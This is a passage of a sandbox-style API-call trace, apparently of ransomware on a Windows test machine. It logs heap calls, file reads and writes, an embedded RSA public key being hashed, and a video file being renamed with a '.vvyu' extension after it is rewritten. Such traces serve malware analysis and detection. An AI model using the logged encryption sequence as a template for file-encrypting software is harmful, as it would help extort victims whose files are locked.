HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0196.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea218 | out: hHeap=0x2c0000) returned 1 [0196.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0196.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.307] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xf57e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xf57e, lpOverlapped=0x0) returned 1 [0196.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.308] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf583, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.308] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0196.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0196.310] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.310] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.310] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.310] CloseHandle (hObject=0x584) returned 1 [0196.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0196.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0196.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0196.313] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\aEjMZwA.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\aejmzwa.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\aEjMZwA.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\aejmzwa.avi.vvyu")) returned 1 [0196.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.314] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0196.317] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7f86790, ftCreationTime.dwHighDateTime=0x1d8a63c, ftLastAccessTime.dwLowDateTime=0x54c02e20, ftLastAccessTime.dwHighDateTime=0x1d8a6b2, ftLastWriteTime.dwLowDateTime=0x54c02e20, ftLastWriteTime.dwHighDateTime=0x1d8a6b2, nFileSizeHigh=0x0, nFileSizeLow=0xa026, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HkpWIkK5Da3UaMj2.mkv", cAlternateFileName="HKPWIK~1.MKV")) returned 1 [0196.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0196.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.318] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\HkpWIkK5Da3UaMj2.mkv") returned=".mkv" [0196.318] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\HkpWIkK5Da3UaMj2.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\hkpwikk5da3uamj2.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.318] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=40998) returned 1 [0196.318] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.322] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.322] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.325] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.325] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xa026, lpOverlapped=0x0) returned 1 [0196.326] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.326] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.326] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.326] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b860) returned 1 [0196.327] CryptCreateHash (in: hProv=0x31b860, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.327] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.327] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.327] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.327] GetLastError () returned 0x0 [0196.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.327] GetLastError () returned 0x0 [0196.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.328] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.328] CryptReleaseContext (hProv=0x31b860, dwFlags=0x0) returned 1 [0196.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.328] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.328] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.329] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa030) returned 0x2af5168 [0196.329] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea218 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6590 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea260 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65a8 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65d8 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6638 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65f0 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.330] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0196.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6638 [0196.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0196.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65f0 [0196.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae65d8 [0196.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0196.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0196.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0196.333] GetCurrentThreadId () returned 0x5d8 [0196.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8c88 [0196.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0196.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b860 [0196.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0196.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.334] GetCurrentThreadId () returned 0x5d8 [0196.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6638 [0196.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65d8 [0196.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0196.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65f0 [0196.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65c0 [0196.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6650 [0196.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.337] RtlAllocateHeap 